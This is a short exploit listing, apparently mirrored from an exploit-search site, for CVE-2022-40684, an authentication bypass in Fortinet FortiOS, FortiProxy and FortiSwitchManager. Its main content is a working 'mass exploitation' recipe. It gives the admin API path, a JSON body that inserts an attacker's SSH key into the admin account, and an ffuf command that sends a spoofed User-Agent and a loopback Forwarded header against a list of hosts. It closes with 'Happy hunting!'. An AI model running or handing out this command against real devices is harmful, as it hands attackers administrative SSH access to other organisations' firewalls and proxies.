Exploit for Improper Authentication in Fortinet Fortiswitchmanager CVE-2022-40684

## https://sploitus.com/exploit?id=D01BC477-0705-586F-B306-8F6B6D7B89FE
# CVE-2022-40684-POC
FortiProxy / FortiOS Authentication bypass

## Mass exploitation

```/api/v2/cmdb/system/admin/<username>```


```{"ssh-public-key1": "<your-id_rsa.pub>"}```

```
ffuf -c -w hosts.txt -u FUZZ/api/v2/cmdb/system/admin/admin -X PUT -H 'User-Agent: Report Runner' -H 'Content-Type: application/json' -H 'Forwarded: for="[127.0.0.1
]:8000";by=”[127.0.0.1]:9000";' -d '{"ssh-public-key1": "kljunowsky"}' -mr "SSH" -r
```

Happy hunting!

### Requirements
[ffuf](https://github.com/ffuf/ffuf)
Thanks [@joohoi](https://github.com/joohoi)!

[Twitter](https://twitter.com/milanshiftsec)

[LinkedIn](https://www.linkedin.com/in/milan-jovic-sec/)